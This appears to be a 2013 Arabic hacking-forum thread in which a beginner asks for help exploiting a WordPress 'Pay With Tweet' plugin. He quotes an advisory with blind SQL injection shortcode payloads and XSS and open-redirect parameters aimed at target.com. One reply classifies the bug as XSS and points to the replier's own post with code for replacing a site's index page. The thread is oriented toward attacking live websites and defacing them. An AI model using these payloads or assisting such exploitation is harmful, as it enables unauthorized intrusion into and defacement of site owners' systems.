التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 02-15-2013, 12:33 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية Sh.Jalilo.Sh
 

 

 
إحصائية العضو







Sh.Jalilo.Sh غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Sh.Jalilo.Sh is on a distinguished road

مطلوب مجاب: مساعدة في استغلال ثغرة Wp !


الســــــــلآم عليــــــكم ورحمـــة الله
إخــــواني العنـــاكب المـــرجو مســاعدتي //
في إستغلال هــذه الثغـــرة / انـا لم أفــهم عليــها لآنــي مبتدأ.

class="smallfont">اقتباس
# Exploit Title: Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities
# Date: 01/06/2012

# Author: Gianluca Brindisi (gATbrindi.si @gbrindisi http://brindi.si/g/)
# Software Link: http://downloads.wordpress.org/plugi...-tweet.1.1.zip

# Version: 1.1


1) Blind SQL Injection in shortcode:
Short code parameter 'id' is prone to blind sqli,

you need to be able to write a post/page to exploit this:


[paywithtweet id="1' AND 1=2"]
[paywithtweet id="1' AND 1=1"]


2) Multiple XSS in pay.php

http://target.com/wp-content/plugins...et.php/pay.php


After connecting to twitter:
?link=&22></input>[XSS]

After submitting the tweet:
?title=[XSS]&dl=[REDIRECT-TO-URL]%27)">[XSS]


The final download link will be replaced with [REDIRECT-TO-URL]


POC: pay.php?link=%22></input>***************(********.******)</script>&title=***************(********.******)</script>&dl=http://brindi.si%27">***************(********.******)</script>

وشكـــرا للجميـع



Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC lshu]m td hsjyghg eyvm Wp !

التوقيع

http://www.qzal.net/01/2013-01/13607005701.jpg

ليس كل من استخدم برامج التصميم أصبح مصمم
ليس كل من ركب صفحة أصبح مطور
ليس كل من كتب كود أصبح مبرمج
ليس كل من اخذ سيرفر أصبح مستضيف
ليس كل من ركب هاك اصبح دعم فني
و لكن كل من تواضع لله أصبح محترف

Sahara Team | 2012-2013

 

   

رد مع اقتباس
أفضل جواب - كتبه MaFia
الثغره Cross site script
شوف هنا
http://www.vbspiders.com/vb/t24757.html

وهنا موضوع طرحت فيه كود رفع اندكس على الموقع بدون التوجيه لاي موقع اخر

http://www.vbspiders.com/vb/t65367.html
قديم 02-15-2013, 09:14 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
إحصائية العضو







Mr-black-laayoune غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Mr-black-laayoune is on a distinguished road

مطلوب رد: مساعدة في استغلال ثغرة Wp !


انــــــــــــــــــــــــــــــــــــــــــــــــ ــــــــــــا ايضا الاخوا،،،،،،نـــــي احتا ... ج مساعدتكم

فـــــــ]ي هـــــــذا الموضوع





التعديل الأخير تم بواسطة Mr-black-laayoune ; 02-15-2013 الساعة 09:18 PM.

   

رد مع اقتباس
قديم 02-17-2013, 01:16 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
MaFia
../Cody
 
الصورة الرمزية MaFia
 

 

 
إحصائية العضو








MaFia غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى MaFia

 

 

إحصائية الترشيح

عدد النقاط : 16
MaFia is on a distinguished road

افتراضي رد: مساعدة في استغلال ثغرة Wp !


الثغره Cross site script
شوف هنا
http://www.vbspiders.com/vb/t24757.html

وهنا موضوع طرحت فيه كود رفع اندكس على الموقع بدون التوجيه لاي موقع اخر

تم اكتشاف ثغره في احد اكبر مواقع الهكرز التركي

التوقيع

"إن للناس وجها شريرا وآخر طيبا والذكاء هو التعامل مع الجزء الطيب

من كل إنسان تقابله في حياتك

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 11:15 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0